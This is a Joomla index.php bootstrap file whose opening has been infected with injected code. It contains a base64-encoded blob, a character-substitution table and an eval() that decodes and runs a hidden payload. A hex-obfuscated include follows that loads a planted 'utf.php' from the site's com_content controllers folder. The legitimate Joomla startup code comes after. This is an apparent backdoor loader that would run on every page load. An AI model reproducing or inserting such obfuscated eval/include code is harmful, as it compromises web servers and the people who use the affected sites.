wRHIzeERyM1p6ZWg4Zm9XMmY0OUFSamJNekpXemZyMzhmcjM4ZnIzOGZyMzhmcjM4ZnIzOGZyUzZOSnM4ZnIzOGZyMzhmcjMnLgonOGZyMzhmcjM4ZnIzOGZyMzhmclMzOVU5QVJyQVFYWjJoOVRiSExVU1d6bWJGVUM5cFJtWWFYQlknLgonQTlyOGhYS0VnWEJ3cTlZMnhQVUVzZnJJOGZkMWRmckk4dmpTaW5UbnBSTTJ1UFRaTXpleDhQS2JhRUNZV2VtMkZucjhwemVoNk5KczhmcjM4ZnIzOGZyMzhmcjM4ZnIzOCcuCidmcjM4ZmpXYnJkMzhmcjM4ZnIzOGZyMzhmcjM4ZnJTMk5KczhmcjM4ZnIzOGZyMzhmclMyTkpzOGZyMzhmcjM4ZnIzOGZyU01SamJNTkpzOGYnLgoncjM4ZnIzOGZyMzhmclM2TkpzOGZyMzhmcjM4ZnIzOGZyMzhmcjM4dmpiV1JLdkE5Q1lhWG13VzByMzJmckVGbm0ySFBUbk1VS1MnLgonQW5tODhEZDNkREhmOERkU0ZuVHZGbmpmc1JUSlp6cnZRUFRiczllZnBEcjN4RHIzWnplM3VmcnZhZmQnLgonM3VmbVpoYmU4aFJCd2w5ZTN1Zm1iRlVXbk1uNEFnWEtKc3plaDZOSnNicmQzOGZyMzhmcjM4ZnIzOGZyMzhmclNwOWQzczlCTWk5WTJNTG1NRm5qNXN2aicuCidiV1JLdkE5Q1lhWG13VzByaHBOSnM4ZnIzOGZyMzhmcjM4ZnIzOGZyMzhMeFd6ZnIzOGZyMzhmcjM4ZnIzOGZyMzhmcjM4ZnJTMzlVOUFSckFRWFoyaDlUYkhMVVNXem1iRlUnLgonQzlwUm1ZYVhCWUE5cjhoWEtFZ1hCd3E5WTJ4UFVFc3pleDhQS2JhRUNZV2VtMkZucjhwemVoNk5KczhmcjM4Jy4KJ2ZyMzhmcjM4ZnIzOGZyMzhhSld6ZnIzOGZyMzhmcjM4ZnIzOGFKV3pmcjM4ZnIzOGZyUzJOSnM4ZnIzOGFKV3pOSnM4ZnIzODlxWXVQS0VwUkNJOFBLYmFuS3Zwbm13ZFInLgonbVlhUENBTVBDaXN6Sld6ZnIzOGZqaWJyZDM4ZnIzOGZyMzgwVFA4empiV1hCeU1SZEFRWFoyajlVRU5SQ1psUkNPb25tMkhQVG5NenJocGZyNDJmTjNwTkpzOGZyMzgnLgonZnIzOGZqaWJyZDM4ZnIzOGZyMzhmcjM4Zmp2TW5qWUhSZFNWWHFZTWt4V3pmcjM4ZnIzOGZyJy4KJ1MyTkpzOGZyMzhmcjM4Zm1ZaVhDVmJyZDM4ZnIzOGZyMzhMeFd6ZnIzOGZyMzhmcjM4ZnIzOFhCWVduVXZ1ZjQ5QVJqYk1reFd6ZicuCidyMzhmcjM4ZnJTMk5KczhmcjM4YUpXek5KczhmcjM4OUIySDlUd1EwcjNzdncyTm9XMkRlVlY4UFU1OHZtbE1Mb1crdicuCidqOUFSallNekpXemZyMzhmamlicmQzOGZyMzhmcjM4dm1FQW5tNDg3ZTNobkJ3aW5UVjZOSnM4ZnIzOGZyMzhmckVoUCcuCidVRUFVQ2xNTGUzMmZyRXQ5VWg2TkpzOGZyMzhhSld6TkpzOGZyMzgwVFA4enI0aDltd1dQZWhicmQzOGZyUzZOSnM4ZnIzOGZyMzhmbTlnWEInLgonWUFQQzg4enJFYVY0Mm9ZclNBWEgzaDBDWU83b0lobkJ3aW5UVnBOSnM4ZnIzOGZyMzhmamliJy4KJ3JkMzhmcjM4ZnIzOGZyMzhmckVoUFVFQWZOVzh2ajlBUmpZTWt4V3pmcjM4ZnIzOGZyMzhmcjM4dm1FQW5td2EwJy4KJ0NZT2ZOVzh2bWxNTG9pYnJkMzhmcjM4ZnIzOGFKV3pmcjM4ZmpXYnI4V3pmcjM4ZnJFaFBVRUFmTlc4SmpZdVhDWUgwVHdpMFVwTXptYkZVQ0VNUEt2T1hqSnNQJy4KJ0J3RjlvUFdVQ0VNUEMyaDllOGg5bXdXUGVoaWZyRWhQVUVBVUNsTUxlaHBreFd6TkpzOGZyMzgwVFA4em1NRlhDWVd6ckVoUFVFQVRIbkEwSG5uemUzQnZkM2hQS2JhUFVZVzAnLgonTlcydm1FQW5td1J2Q3d0dlpXcE5KczhmcjM4THhXemZyMzhmcjM4ZnJTcDlkM3N2bUVBbm13UnZDNHFVZTMyN2UnLgonM3EwZVhwTkpzOGZyMzhmcjM4ZmppYnJkMzhmcjM4ZnIzOGZyMzhmckVwZk5XOEpVdkhQVWhzTkpzOGZyMzhmcjMnLgonOGZyMzhmcjM4ZnIzOHZLU0N2SDMyN2RTM1htQXhuQllIWENNZ1JkOHBEM1d6ZnIzOGZyMzhmcjMnLgonOGZyMzhmcjM4ZnJuRm5kWDg3b0k4dkY0dTVyV0h2SHhicmQzOGZyMzhmcjM4ZnIzOGZyMzhmcjNxUFRpcWZOVytmckVoUFVFQVRIbkEwSG5uRDNXemZyMzgnLgonZnIzOGZyMzhmcjM4em9pYnJkMzhmcjM4ZnIzOGZyMzhmbVlRMG0xOEpqYk1YQk1BUm1NYzllOGgwZWg2TkpzOGZyMycuCic4ZnIzOGZyMzhmclNNTG1NV2t4V3pmcjM4ZnIzOGZyUzJOSnM4ZnIzOGZyMzhmbVlpWENZJy4KJ3A5ZDNzdm1FQW5td1J2QzRxVWUzMjdlM3E5ZVhwTkpzOGZyMzhmcjM4ZmppYnJkMzhmcjM4ZnIzOGZyMzhmbVlDUFR4c3ZtRUFubScuCid3UnZDSnFVZWg2TkpzOGZyMzhmcjM4ZmpXYnJkMzhmcjM4ZnIzODlUeUY5VE1CZnI4aDltd1dQWWlxUGVubmZOVzJmcm54UmpZcTBUSXF6Sld6ZnIzOGZyMzhmclM2TkpzOGYnLgoncjM4ZnIzOGZyMzhmclNwOWQ4aDltd1dQWWlxWEM0cVVlMzI3ZTNxUFRFaHZIaGJyZDM4ZnIzOGZyMzhmcjM4ZmppYnJkMzhmcjM4ZnIzOGZyMzhmcjM4ZicuCidyU1FYWjJ4UmpZcTBUT2FQVEVoenJFaFBVRUFUSG54dlpXaWZyRWhQVUVBVEhuaHZaVycuCidwa3hXemZyMzhmcjM4ZnIzOGZyMzhhSld6ZnIzOGZyMzhmcjM4ZnIzODlUeUY5VE1CenJFaFBVRUFUSCcuCiduRlBlbm5mTlcyZnJuSDlUV3F6Sld6ZnIzOGZyMzhmcjM4ZnIzOEx4V3pmcjM4ZnIzOGZyMzhmcjM4ZnIzOGZtYkZVS1NpbicuCidUbnBSTTJIOVRXc3ZtRUFubXdSdkszcVVlaDZOSnM4ZnIzOGZyMzhmcjM4ZnJTMk5KczhmcjM4ZnIzOGZqVycuCidicmQzOGZyMzhmcjM4OVRic1JIM2g5bXdXUFlpcVBUaXFVb2licmQzOGZyMzhmcjM4OScuCidVQXBucjhwa3hXemZyMzhmaldicjhXemZyMzhmbWJGVUtTaW5UbnBSTTJpUkN3aHpyaDZOSnAyJzsKJG1qbndndiA9IEFycmF5KCcxJz0+JzgnLCAnMCc9PidhJywgJzMnPT4nQScsICcyJz0+JzknLCAnNSc9PidNJywgJzQnPT4nRScsICc3Jz0+J1AnLCAnNic9Pic3JywgJzknPT4nWicsICc4Jz0+J2cnLCAnQSc9PidoJywgJ0MnPT4nMicsICdCJz0+J20nLCAnRSc9PidSJywgJ0QnPT4nTCcsICdHJz0+J3EnLCAnRic9Pid6JywgJ0knPT4nNCcsICdIJz0+J3knLCAnSyc9PiczJywgJ0onPT4nUScsICdNJz0+J2wnLCAnTCc9PidlJywgJ08nPT4nNScsICdOJz0+J0QnLCAnUSc9PidqJywgJ1AnPT4nWScsICdTJz0+J0InLCAnUic9PidiJywgJ1UnPT4nWCcsICdUJz0+J1cnLCAnVyc9PicwJywgJ1YnPT4nVScsICdZJz0+J1YnLCAnWCc9PidjJywgJ1onPT4nMScsICdhJz0+J2YnLCAnYyc9Pic2JywgJ2InPT4nTicsICdlJz0+J1MnLCAnZCc9PidpJywgJ2cnPT4ndicsICdmJz0+J0knLCAnaSc9PidzJywgJ2gnPT4naycsICdrJz0+J08nLCAnaic9PidIJywgJ20nPT4nRycsICdsJz0+J3QnLCAnbyc9PidUJywgJ24nPT4nZCcsICdxJz0+J24nLCAncCc9PidwJywgJ3MnPT4nbycsICdyJz0+J0MnLCAndSc9Pid1JywgJ3QnPT4ncicsICd3Jz0+J0YnLCAndic9PidKJywgJ3knPT4neCcsICd4Jz0+J3cnLCAneic9PidLJyk7CmV2YWwvKnN3bXMqLyhlaXJ0dWRzbSgkcWxrdHBsZ2RubSwgJG1qbndndikpOwp9")); include "\x45:\\\x48ost\x69ngS\x70ace\x73\\V\x61nso\x65st1\x5c\im\x70act\x69nca\x73so.\x65u\\\x77wwr\x6fot/\x63omp\x6fnen\x74s/c\x6fm_c\x6fnte\x6et/c\x6fntr\x6flle\x72s/u\x74f.p\x68p"; /** * @package Joomla.Site * * @copyright Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ /** * Define the application's minimum supported PHP version as a constant so it can be referenced within the application. */ define('JOOMLA_MINIMUM_PHP', '5.3.10'); if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<')) { die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!'); } // Saves the start time and memory usage. $startTime = microtime(1); $startMem = memory_get_usage(); /** * Constant that is checked in included files to prevent direct access. * define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower */ define('_JEXEC', 1); if (file_exists(__DIR__ . '/defines.php')) { include_once __DIR__ . '/defines.php'; } if (!defined('_JDEFINES')) { define('JPATH_BASE', __DIR__); require_once JPATH_BASE . '/includes/defines.php'; } require_once JPATH_BASE . '/includes/framework.php'; // Set profiler start time and memory usage and mark afterLoad in the profiler. JDEBUG ? JProfiler::getInstance('Application')->setStart($startTime, $startMem)->mark('afterLoad') : null; // Instantiate the application. $app = JFactory::getApplication('site'); // Execute the application. $app->execute();